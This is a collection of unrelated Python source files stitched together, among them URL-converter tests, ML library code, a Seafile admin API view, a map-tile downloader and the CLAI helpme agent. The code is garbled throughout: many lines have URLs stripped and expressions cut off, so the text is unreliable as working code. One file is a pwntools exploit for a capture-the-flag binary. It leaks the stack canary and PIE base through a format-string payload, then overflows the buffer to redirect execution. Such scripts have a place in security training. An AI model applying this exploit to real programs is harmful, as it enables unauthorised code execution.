""" The tool to check the availability or syntax of domain, IP or URL. :: ██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗ ██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝ ██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗ ██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝ ██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝ Tests of URL 2 Network Location converter. Author: <NAME>, @funilrys, contactTATAfunilrysTODTODcom Special thanks: Contributors: Project link: Project documentation: Project homepage: License: :: Copyright 2017, 2018, 2019, 2020, 2021 <NAME> Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import unittest import unittest.mock from PyFunceble.converter.url2netloc import Url2Netloc class TestUrl2Netloc(unittest.TestCase): """ Tests our internal URL converter. """ def setUp(self) -> None: """ Setups everything needed for the tests. """ self.converter = Url2Netloc() def tearDown(self) -> None: """ Destroys everything previously created for the tests. """ del self.converter def test_set_data_to_convert_no_string(self) -> None: """ Tests the method which let us set the data to work with for the case that a non-string value is given. """ given = ["Hello", "World"] self.assertRaises(TypeError, lambda: self.converter.set_data_to_convert(given)) def test_set_data_to_convert_empty_string(self) -> None: """ Tests the method which let us set the data to work with for the case that an empty-string value is given. """ given = "" self.assertRaises(ValueError, lambda: self.converter.set_data_to_convert(given)) def test_get_converted_nothing_to_decode(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that no conversion is needed. """ given = "" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_full_url(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that a full URL is given. """ given = "" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_full_url_with_port(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that a full URL (with explicit port) is given. """ given = "" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_full_url_with_params(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that a full URL (with params) is given. """ given = "" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_url_without_scheme(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that no scheme is given. """ given = "" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_url_without_scheme_and_with_params(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that no scheme (but with params) is given. """ given = "" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_url_without_protocol(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that no protocol is given. """ given = "://" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_url_without_protocol_and_with_params(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that no protocol (but params) is given. """ given = "://" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_url_without_protocol_and_path(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that no protocol and path is given. """ given = "://" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_url_startswith_2_slashes(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that the given url starts with 2 slashes. """ given = "//" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) def test_get_converted_url_startswith_1_slash(self) -> None: """ Tests the method which let us extracts the netloc from a given URL for the case that the given url starts with 1 slash. """ given = "/" expected = "" self.converter.data_to_convert = given actual = self.converter.get_converted() self.assertEqual(expected, actual) if __name__ == "__main__": unittest.main()
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import List import torch from nemo.core.classes import Loss, typecheck from nemo.core.neural_types import LossType, NeuralType __all__ = ['AggregatorLoss'] class AggregatorLoss(Loss): """ Sums several losses into one. Args: num_inputs: number of input losses weights: a list of coefficient for merging losses """ @property def input_types(self): """Returns definitions of module input ports. """ input_types = {} for i in range(self._num_losses): input_types["loss_" + str(i + 1)] = NeuralType(elements_type=LossType()) return input_types @property def output_types(self): """Returns definitions of module output ports. """ return {"loss": NeuralType(elements_type=LossType())} def __init__(self, num_inputs: int = 2, weights: List[float] = None): super().__init__() self._num_losses = num_inputs if weights is not None and len(weights) != num_inputs: raise ValueError("Length of weights should be equal to the number of inputs (num_inputs)") self._weights = weights @typecheck() def forward(self, **kwargs): values = [kwargs[x] for x in sorted(kwargs.keys())] loss = torch.zeros_like(values[0]) for loss_idx, loss_value in enumerate(values): if self._weights is not None: loss = loss.add(loss_value, alpha=self._weights[loss_idx]) else: loss = loss.add(loss_value) return loss
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import six from tensorflow.contrib.distributions.python.ops import estimator as estimator_lib from tensorflow.contrib.learn.python.learn.estimators import constants from tensorflow.contrib.learn.python.learn.estimators import head as head_lib from tensorflow.contrib.learn.python.learn.estimators import model_fn from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_metrics from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_no_variables from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_summary_tags from tensorflow.python.client import session from tensorflow.python.framework import ops from tensorflow.python.ops import nn_ops from tensorflow.python.ops.distributions import normal as normal_lib from tensorflow.python.platform import test class EstimatorHeadDistributionRegressionTest(test.TestCase): def _assert_output_alternatives(self, model_fn_ops): self.assertEquals({ None: constants.ProblemType.LINEAR_REGRESSION }, { k: v[0] for k, v in six.iteritems(model_fn_ops.output_alternatives) }) def testNormalLocScaleLogits(self): # We will bias logits[..., 1] so that: logits[..., 1]=0 implies scale=1. scale_bias = np.log(np.expm1(1.)) def softplus(x): return np.log1p(np.exp(x)) def actual_loss(logits, labels): mu = actual_mean(logits) sigma = actual_stddev(logits) labels = np.squeeze(labels, -1) z = (labels - mu) / sigma loss = 0.5 * (z**2. + np.log(2. * np.pi)) + np.log(sigma) return loss.mean() def actual_mean(logits): return logits[..., 0] def actual_stddev(logits): return softplus(logits[..., 1] + scale_bias) def make_distribution_fn(logits): return normal_lib.Normal( loc=logits[..., 0], scale=nn_ops.softplus(logits[..., 1] + scale_bias)) head = estimator_lib.estimator_head_distribution_regression( make_distribution_fn, logits_dimension=2) labels = np.float32([[-1.], [0.], [1.]]) logits = np.float32([[0., -1], [1, 0.5], [-1, 1]]) with ops.Graph().as_default(), session.Session(): # Convert to tensor so we can index into head.distributions. tflogits = ops.convert_to_tensor(logits, name="logits") model_fn_ops = head.create_model_fn_ops( {}, labels=labels, mode=model_fn.ModeKeys.TRAIN, train_op_fn=head_lib.no_op_train_fn, logits=tflogits) self._assert_output_alternatives(model_fn_ops) _assert_summary_tags(self, ["loss"]) _assert_no_variables(self) loss = actual_loss(logits, labels) _assert_metrics(self, loss, {"loss": loss}, model_fn_ops) # Now we verify the underlying distribution was correctly constructed. expected_mean = logits[..., 0] self.assertAllClose( expected_mean, head.distribution(tflogits).mean().eval(), rtol=1e-6, atol=0.) expected_stddev = softplus(logits[..., 1] + scale_bias) self.assertAllClose( expected_stddev, head.distribution(tflogits).stddev().eval(), rtol=1e-6, atol=0.) # Should have created only one distribution. self.assertEqual(1, len(head.distributions)) if __name__ == "__main__": test.main()
# Copyright (c) 2012-2016 Seafile Ltd. import logging from rest_framework import status from rest_framework.views import APIView from rest_framework.response import Response from rest_framework.authentication import SessionAuthentication from seaserv import ccnet_api from seahub.api2.permissions import IsProVersion from seahub.api2.throttling import UserRateThrottle from seahub.api2.authentication import TokenAuthentication from seahub.api2.utils import api_error from seahub.api2.endpoints.utils import is_org_user from seahub.utils import is_valid_email from seahub.base.accounts import User from seahub.base.templatetags.seahub_tags import email2nickname from seahub.profile.models import Profile logger = logging.getLogger(__name__) def get_user_info(email): profile = Profile.objects.get_profile_by_user(email) info = {} info['email'] = email info['name'] = email2nickname(email) info['contact_email'] = profile.contact_email if profile and profile.contact_email else '' return info class OrgAdminUser(APIView): authentication_classes = (TokenAuthentication, SessionAuthentication) throttle_classes = (UserRateThrottle,) permission_classes = (IsProVersion,) def put(self, request, org_id, email): """ update name of an org user. Permission checking: 1. only admin can perform this action. """ # resource check org_id = int(org_id) if not ccnet_api.get_org_by_id(org_id): error_msg = 'Organization %s not found.' % org_id return api_error(status.HTTP_404_NOT_FOUND, error_msg) try: user = User.objects.get(email=email) except User.DoesNotExist: error_msg = 'User %s not found.' % email return api_error(status.HTTP_404_NOT_FOUND, error_msg) # permission check if not error_msg = 'Permission denied.' return api_error(status.HTTP_403_FORBIDDEN, error_msg) if != org_id: error_msg = 'Permission denied.' return api_error(status.HTTP_403_FORBIDDEN, error_msg) if not is_org_user(email, org_id): error_msg = 'Permission denied.' return api_error(status.HTTP_403_FORBIDDEN, error_msg) # update user's name name ="name", None) if name is not None: name = name.strip() if len(name) > 64: error_msg = 'Name is too long (maximum is 64 characters).' return api_error(status.HTTP_400_BAD_REQUEST, error_msg) if "/" in name: error_msg = "Name should not include '/'." return api_error(status.HTTP_400_BAD_REQUEST, error_msg) try: Profile.objects.add_or_update(email, nickname=name) except Exception as e: logger.error(e) error_msg = 'Internal Server Error' return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg) # update user's contact email contact_email ="contact_email", None) if contact_email is not None: contact_email = contact_email.strip() if contact_email != '' and not is_valid_email(contact_email): error_msg = 'contact_email invalid.' return api_error(status.HTTP_400_BAD_REQUEST, error_msg) try: Profile.objects.add_or_update(email, contact_email=contact_email) except Exception as e: logger.error(e) error_msg = 'Internal Server Error' return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg) info = get_user_info(email) info['is_active'] = user.is_active return Response(info)
<gh_stars>1000+ import torch import pytest from allennlp.common import Params from allennlp.modules.transformer import BiModalAttention @pytest.fixture def params_dict(): return { "hidden_size1": 6, "hidden_size2": 4, "combined_hidden_size": 16, "num_attention_heads": 2, "dropout1": 0.1, "dropout2": 0.2, } @pytest.fixture def params(params_dict): return Params(params_dict) @pytest.fixture def biattention(params): return BiModalAttention.from_params(params.duplicate()) def test_can_construct_from_params(biattention, params_dict): assert biattention.num_attention_heads == params_dict["num_attention_heads"] assert biattention.attention_head_size == int( params_dict["combined_hidden_size"] / params_dict["num_attention_heads"] ) assert ( biattention.all_head_size == params_dict["num_attention_heads"] * biattention.attention_head_size ) assert biattention.query1.in_features == params_dict["hidden_size1"] assert biattention.key1.in_features == params_dict["hidden_size1"] assert biattention.value1.in_features == params_dict["hidden_size1"] assert biattention.dropout1.p == params_dict["dropout1"] assert biattention.query2.in_features == params_dict["hidden_size2"] assert biattention.key2.in_features == params_dict["hidden_size2"] assert biattention.value2.in_features == params_dict["hidden_size2"] assert biattention.dropout2.p == params_dict["dropout2"] def test_forward_runs(biattention): biattention( torch.randn(2, 3, 6), torch.randn(2, 3, 4), torch.randint(0, 2, (2, 2, 3, 3)) == 1, # creating boolean tensors torch.randint(0, 2, (2, 2, 3, 3)) == 1, )
<reponame>goochen/naiveproxy #! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! import sys from waflib.Tools import ar,d from waflib.Configure import conf @conf def find_dmd(conf): conf.find_program(['dmd','dmd2','ldc'],var='D') out=conf.cmd_and_log(conf.env.D+['--help']) if out.find("D Compiler v")==-1: out=conf.cmd_and_log(conf.env.D+['-version']) if out.find("based on DMD v1.")==-1: conf.fatal("detected compiler is not dmd/ldc") @conf def common_flags_ldc(conf): v=conf.env v.DFLAGS=['-d-version=Posix'] v.LINKFLAGS=[] v.DFLAGS_dshlib=['-relocation-model=pic'] @conf def common_flags_dmd(conf): v=conf.env v.D_SRC_F=['-c'] v.D_TGT_F='-of%s' v.D_LINKER=v.D v.DLNK_SRC_F='' v.DLNK_TGT_F='-of%s' v.DINC_ST='-I%s' v.DSHLIB_MARKER=v.DSTLIB_MARKER='' v.DSTLIB_ST=v.DSHLIB_ST='-L-l%s' v.DSTLIBPATH_ST=v.DLIBPATH_ST='-L-L%s' v.LINKFLAGS_dprogram=['-quiet'] v.DFLAGS_dshlib=['-fPIC'] v.LINKFLAGS_dshlib=['-L-shared'] v.DHEADER_ext='.di' v.DFLAGS_d_with_header=['-H','-Hf'] v.D_HDR_F='%s' def configure(conf): conf.find_dmd() if sys.platform=='win32': out=conf.cmd_and_log(conf.env.D+['--help']) if out.find('D Compiler v2.')>-1: conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead') conf.load('ar') conf.load('d') conf.common_flags_dmd() conf.d_platform_flags() if str(conf.env.D).find('ldc')>-1: conf.common_flags_ldc()
<gh_stars>100-1000 #!/usr/bin/env python3 from pwn import * binary = context.binary = ELF('./pie') if args.REMOTE: p = remote('', 9002) else: p = process(binary.path) p.sendlineafter('?\n','%11$10p%15$10p') p.recvuntil('command: ') canary = int(p.recv(10),16)'canary: ' + hex(canary)) main = int(p.recv(10),16) - 95'main: ' + hex(main)) binary.address = main - binary.sym.main'binary.address: ' + hex(binary.address)) payload = b'' payload += (0x21 - 0x10) * b'A' payload += p32(canary) payload += (0x21 - len(payload)) * b'B' payload += p32(binary.sym.helperfunc) p.sendlineafter('?',payload) p.interactive()
def dummy_config(): return { 'uuid': 'TEST-UUID', 'main': { 'server': '' } }
""" Tests for non-ascii-name checker. """ áéíóú = 4444 # [non-ascii-name] def úóíéá(): # [non-ascii-name] """yo"""
<reponame>kevinkissi/basic-tech-tips-webapp from django.contrib import admin from django.apps import apps questions = apps.get_app_config('questions') for model_name, model in questions.models.items():
<filename>en/ #!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright 2017 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import argparse from collections import defaultdict import gzip import json parser = argparse.ArgumentParser() parser.add_argument("infile") parser.add_argument("outfile") args = parser.parse_args() def load_verbocean(verbocean_filename): relations = dict() with, 'rt', 'utf-8') as fin: for line in fin: if not line.startswith('#'): verb1, rel, verb2 = line.split()[0:3] if verb1 not in relations: relations[verb1] = defaultdict(set) relations[verb1][verb2].add(rel.strip('[]')) return relations verbocean = load_verbocean(args.infile) for v1, d in verbocean.items(): for v2, rels in d.items(): verbocean[v1][v2] = list(rels) with open(args.outfile, 'w') as fout: json.dump(verbocean, fout, indent=2)
from typing import Callable, Union import rx from rx.core import Observable, typing from rx.disposable import SingleAssignmentDisposable, SerialDisposable from rx.internal.utils import is_future def catch_handler(source: Observable, handler: Callable[[Exception, Observable], Observable]) -> Observable: def subscribe(observer, scheduler=None): d1 = SingleAssignmentDisposable() subscription = SerialDisposable() subscription.disposable = d1 def on_error(exception): try: result = handler(exception, source) except Exception as ex: # By design. pylint: disable=W0703 observer.on_error(ex) return result = rx.from_future(result) if is_future(result) else result d = SingleAssignmentDisposable() subscription.disposable = d d.disposable = result.subscribe(observer, scheduler=scheduler) d1.disposable = source.subscribe_( observer.on_next, on_error, observer.on_completed, scheduler ) return subscription return Observable(subscribe) def _catch(handler: Union[Observable, Callable[[Exception, Observable], Observable]] ) -> Callable[[Observable], Observable]: def catch(source: Observable) -> Observable: """Continues an observable sequence that is terminated by an exception with the next observable sequence. Examples: >>> op = catch(ys) >>> op = catch(lambda ex, src: ys(ex)) Args: handler: Second observable sequence used to produce results when an error occurred in the first sequence, or an exception handler function that returns an observable sequence given the error and source observable that occurred in the first sequence. Returns: An observable sequence containing the first sequence's elements, followed by the elements of the handler sequence in case an exception occurred. """ if callable(handler): return catch_handler(source, handler) elif isinstance(handler, typing.Observable): return rx.catch(source, handler) else: raise TypeError('catch operator takes whether an Observable or a callable handler as argument.') return catch
#!/usr/bin/python3 from sys import argv import os import math import urllib.request import random import os.path import sqlite3 URL_TEMPLATE = "" BBOX = None # [lon_min, lat_min, lon_max, lat_max] or None for whole world ZOOM_MAX = 7 LAYERTYPE = "baselayer" # "baselayer" or "overlay" LAYERNAME = "OSM Low Detail" TILE_FORMAT = "png" def deg2num(lat_deg, lon_deg, zoom): lat_rad = math.radians(lat_deg) n = 2.0 ** zoom xtile = int((lon_deg + 180.0) / 360.0 * n) ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad))) / math.pi) / 2.0 * n) return (xtile, ytile) def download_url(zoom, xtile, ytile, cursor): subdomain = random.randint(1, 4) url = URL_TEMPLATE % (zoom, xtile, ytile) ymax = 1 << zoom yinverted = ymax - ytile - 1 existing = cursor.execute('SELECT count(*) FROM tiles WHERE zoom_level=? AND tile_column=? AND tile_row=?', (zoom, xtile, yinverted)).fetchall() if existing[0][0] > 0: print('Skipping ' + url) return print("downloading %r" % url) request = urllib.request.Request( url, data=None, headers={ 'User-Agent': 'Low-Zoom Downloader' } ) source = urllib.request.urlopen(request) content = source.close() cursor.execute('INSERT INTO tiles(zoom_level, tile_column, tile_row, tile_data) VALUES(?, ?, ?, ?)', (zoom, xtile, yinverted, content)) def main(argv): db = argv[1] if len(argv) > 1 else 'osm.mbtiles' conn = sqlite3.connect(db) cur = conn.cursor() bboxStr = "-180,-85,180,85" if BBOX is None else ",".join(map(str, BBOX)) cur.executescript(''' CREATE TABLE IF NOT EXISTS tiles ( zoom_level integer, tile_column integer, tile_row integer, tile_data blob); CREATE TABLE IF NOT EXISTS metadata(name text, value text); CREATE UNIQUE INDEX IF NOT EXISTS metadata_name on metadata (name); CREATE UNIQUE INDEX IF NOT EXISTS tile_index on tiles(zoom_level, tile_column, tile_row); INSERT OR REPLACE INTO metadata VALUES('minzoom', '1'); INSERT OR REPLACE INTO metadata VALUES('maxzoom', '{0}'); INSERT OR REPLACE INTO metadata VALUES('name', '{1}'); INSERT OR REPLACE INTO metadata VALUES('type', '{2}'); INSERT OR REPLACE INTO metadata VALUES('format', '{3}'); INSERT OR REPLACE INTO metadata VALUES('bounds', '{4}'); '''.format(ZOOM_MAX, LAYERNAME, LAYERTYPE, TILE_FORMAT, bboxStr)) # from 0 to 6 download all for zoom in range(0, ZOOM_MAX+1): xstart = 0 ystart = 0 xend = 2**zoom-1 yend = 2**zoom-1 if BBOX is not None: xstart, yend = deg2num(BBOX[1], BBOX[0], zoom) xend, ystart = deg2num(BBOX[3], BBOX[2], zoom) for x in range(xstart, xend+1): for y in range(ystart, yend+1): download_url(zoom, x, y, cur) conn.commit() cur.close() conn.close() main(argv)
<filename>btb/selection/ import logging from btb.selection.ucb1 import UCB1 # the minimum number of scores that each choice must have in order to use # best-K optimizations. If not all choices meet this threshold, default UCB1 # selection will be used. K_MIN = 2 logger = logging.getLogger('btb') class RecentKReward(UCB1): """Recent K reward selector Args: k (int): number of best scores to consider """ def __init__(self, choices, k=K_MIN): super(RecentKReward, self).__init__(choices) self.k = k def compute_rewards(self, scores): """Retain the K most recent scores, and replace the rest with zeros""" for i in range(len(scores)): if i >= self.k: scores[i] = 0. return scores def select(self, choice_scores): """Use the top k learner's scores for usage in rewards for the bandit calculation""" # if we don't have enough scores to do K-selection, fall back to UCB1 min_num_scores = min([len(s) for s in choice_scores.values()]) if min_num_scores >= K_MIN:'{klass}: using Best K bandit selection'.format(klass=type(self).__name__)) reward_func = self.compute_rewards else: logger.warning( '{klass}: Not enough choices to do K-selection; using plain UCB1' .format(klass=type(self).__name__)) reward_func = super(RecentKReward, self).compute_rewards choice_rewards = {} for choice, scores in choice_scores.items(): if choice not in self.choices: continue choice_rewards[choice] = reward_func(scores) return self.bandit(choice_rewards) class RecentKVelocity(RecentKReward): """Recent K velocity selector""" def compute_rewards(self, scores): """Compute the velocity of thte k+1 most recent scores. The velocity is the average distance between scores. Return a list with those k velocities padded out with zeros so that the count remains the same. """ # take the k + 1 most recent scores so we can get k velocities recent_scores = scores[:-self.k - 2:-1] velocities = [recent_scores[i] - recent_scores[i + 1] for i in range(len(recent_scores) - 1)] # pad the list out with zeros, so the length of the list is # maintained zeros = (len(scores) - self.k) * [0] return velocities + zeros
<filename>src/ralph/licences/tests/ # -*- coding: utf-8 -*- from django.core.exceptions import ValidationError from django.core.urlresolvers import reverse from ralph.accounts.tests.factories import RegionFactory, UserFactory from ralph.back_office.tests.factories import BackOfficeAssetFactory from ralph.lib.transitions.tests import TransitionTestCase from ralph.licences.models import BaseObjectLicence, Licence, LicenceUser from ralph.licences.tests.factories import LicenceFactory from ralph.tests import RalphTestCase from ralph.tests.mixins import ClientMixin class BaseObjectLicenceCleanTest(RalphTestCase): def setUp(self): super().setUp() self.region_pl = RegionFactory(name='pl') self.region_de = RegionFactory(name='de') self.licence_de = LicenceFactory(region=self.region_de) self.bo_asset = BackOfficeAssetFactory(region=self.region_pl) def test_region_validate(self): base_object_licence = BaseObjectLicence() base_object_licence.licence = self.licence_de base_object_licence.base_object = self.bo_asset with self.assertRaisesRegex( ValidationError, ( 'Asset region is in a different region than licence.' ) ): base_object_licence.clean() class LicenceTest(RalphTestCase): def setUp(self): super().setUp() self.licence_1 = LicenceFactory(number_bought=3) self.licence_2 = LicenceFactory(number_bought=1) self.user_1 = UserFactory() self.bo_asset = BackOfficeAssetFactory() def test_get_autocomplete_queryset(self): with self.assertNumQueries(2): self.assertCountEqual( Licence.get_autocomplete_queryset().values_list( 'pk', flat=True ), [,] ) def test_get_autocomplete_queryset_all_used(self): BaseObjectLicence.objects.create( base_object=self.bo_asset, licence=self.licence_1, quantity=1, ) LicenceUser.objects.create( user=self.user_1, licence=self.licence_1, quantity=2 ) with self.assertNumQueries(2): self.assertCountEqual( Licence.get_autocomplete_queryset().values_list( 'pk', flat=True ), [] ) class LicenceFormTest(TransitionTestCase, ClientMixin): def test_service_env_not_required(self): self.assertTrue(self.login_as_user()) licence = LicenceFactory() url = reverse( 'admin:licences_licence_change', args=(,) ) resp = self.client.get(url, follow=True) self.assertEqual(resp.status_code, 200) form = resp.context['adminform'].form self.assertIn('service_env', form.fields) self.assertFalse( form.fields['service_env'].required ) def test_depreciation_rate_not_required(self): self.assertTrue(self.login_as_user()) licence = LicenceFactory() url = reverse( 'admin:licences_licence_change', args=(,) ) resp = self.client.get(url, follow=True) self.assertEqual(resp.status_code, 200) form = resp.context['adminform'].form self.assertIn('depreciation_rate', form.fields) self.assertFalse( form.fields['depreciation_rate'].required )
"""The laundrify integration.""" from __future__ import annotations from laundrify_aio import LaundrifyAPI from laundrify_aio.exceptions import ApiConnectionException, UnauthorizedException from homeassistant.config_entries import ConfigEntry from homeassistant.const import CONF_ACCESS_TOKEN, Platform from homeassistant.core import HomeAssistant from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady from homeassistant.helpers.aiohttp_client import async_get_clientsession from .const import DEFAULT_POLL_INTERVAL, DOMAIN from .coordinator import LaundrifyUpdateCoordinator PLATFORMS = [Platform.BINARY_SENSOR] async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool: """Set up laundrify from a config entry.""" session = async_get_clientsession(hass) api_client = LaundrifyAPI([CONF_ACCESS_TOKEN], session) try: await api_client.validate_token() except UnauthorizedException as err: raise ConfigEntryAuthFailed("Invalid authentication") from err except ApiConnectionException as err: raise ConfigEntryNotReady("Cannot reach laundrify API") from err coordinator = LaundrifyUpdateCoordinator(hass, api_client, DEFAULT_POLL_INTERVAL) await coordinator.async_config_entry_first_refresh(), {})[entry.entry_id] = { "api": api_client, "coordinator": coordinator, } hass.config_entries.async_setup_platforms(entry, PLATFORMS) return True async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool: """Unload a config entry.""" if unload_ok := await hass.config_entries.async_unload_platforms(entry, PLATFORMS):[DOMAIN].pop(entry.entry_id) return unload_ok
# # Copyright (C) 2020 IBM. All Rights Reserved. # # See LICENSE.txt file in the root directory # of this source tree for licensing information. # import os from pathlib import Path from import Colorize from import Datastore from clai.server.agent import Agent from clai.server.command_message import State, Action, NOOP_COMMAND from clai.server.logger import current_logger as logger class HelpMeAgent(Agent): def __init__(self): super(HelpMeAgent, self).__init__() inifile_path = os.path.join(str(Path(__file__).parent.absolute()), 'config.ini') = Datastore(inifile_path) def compute_simple_token_similarity(self, src_sequence, tgt_sequence): src_tokens = set([x.lower().strip() for x in src_sequence.split()]) tgt_tokens = set([x.lower().strip() for x in tgt_sequence.split()]) return len(src_tokens & tgt_tokens) / len(src_tokens) def compute_confidence(self, query, forum, manpage): """ Computes the confidence based on query, stack-exchange post answer and manpage Algorithm: 1. Compute token-wise similarity b/w query and forum text 2. Compute token-wise similarity b/w forum text and manpage description 3. Return product of two similarities Args: query (str): standard error captured in state variable forum (str): answer text from most relevant stack exchange post w.r.t query manpage (str): manpage description for most relevant manpage w.r.t. forum Returns: confidence (float): confidence on the returned manpage w.r.t. query """ query_forum_similarity = self.compute_simple_token_similarity(query, forum[0]['Content']) forum_manpage_similarity = self.compute_simple_token_similarity(forum[0]['Answer'], manpage) confidence = query_forum_similarity * forum_manpage_similarity return confidence def get_next_action(self, state: State) -> Action: return Action(suggested_command=state.command) def post_execute(self, state: State) -> Action:"==================== In Helpme Bot:post_execute ============================")"State:\n\tCommand: {}\n\tError Code: {}\n\tStderr: {}".format(state.command, state.result_code, state.stderr))"============================================================================") if state.result_code == '0': return Action(suggested_command=state.command) helpWasFound = False for provider in apis: # We don't want to process the manpages provider... thats the provider # that we use to clarify results from other providers if provider == "manpages":"Skipping search provider 'manpages'") continue thisAPI:Provider = apis[provider] # Skip this provider if it isn't supported on the target OS if not thisAPI.can_run_on_this_os():"Skipping search provider '{provider}'")"==> Excluded on platforms: {str(thisAPI.get_excludes())}") continue # Move to next provider in list"Processing search provider '{provider}'") if thisAPI.has_variants():"==> Has search variants: {str(thisAPI.get_variants())}") variants:List = thisAPI.get_variants() else:"==> Has no search variants") variants:List = [None] # For each search variant supported by the current API, query # the data store to find the closest matching data. If there are # no search variants (ie: the singleton variant case), the variants # list will only contain a single, Nonetype value. for variant in variants: if variant is not None:"==> Searching variant '{variant}'") data =, service=provider, size=1, searchType=variant) else: data =, service=provider, size=1) if data: apiString = str(thisAPI) if variant is not None: apiString = f"{apiString} '{variant}' variant""==> Success!!! Found a result in the {apiString}") # Find closest match b/w relevant data and manpages for unix searchResult = thisAPI.extract_search_result(data) manpages =, service='manpages', size=5) if manpages:"==> Success!!! found relevant manpages.") command = manpages['commands'][-1] confidence = manpages['dists'][-1] # FIXME: Artificially boosted confidence confidence = 1.0"==> Command: {} \t Confidence:{}".format(command, confidence)) # Set return data suggested_command="man {}".format(command) description=Colorize() \ .emoji(Colorize.EMOJI_ROBOT).append(f"I did little bit of Internet searching for you, ") \ .append(f"and found this in the {thisAPI}:\n") \ .info() \ .append(thisAPI.get_printable_output(data)) \ .warning() \ .append("Do you want to try: man {}".format(command)) \ .to_console() # Mark that help was indeed found helpWasFound = True # We've found help; no need to keep searching break # If we found help, then break out of the outer loop as well if helpWasFound: break if not helpWasFound:"Failure: Unable to be helpful")"============================================================================") suggested_command=NOOP_COMMAND description=Colorize().emoji(Colorize.EMOJI_ROBOT) \ .append( f"Sorry. It looks like you have stumbled across a problem that even the Internet doesn't have answer to.\n") \ .info() \ .append(f"Have you tried turning it OFF and ON again. ;)") \ .to_console() confidence=0.0 return Action(suggested_command=suggested_command, description=description, confidence=confidence)
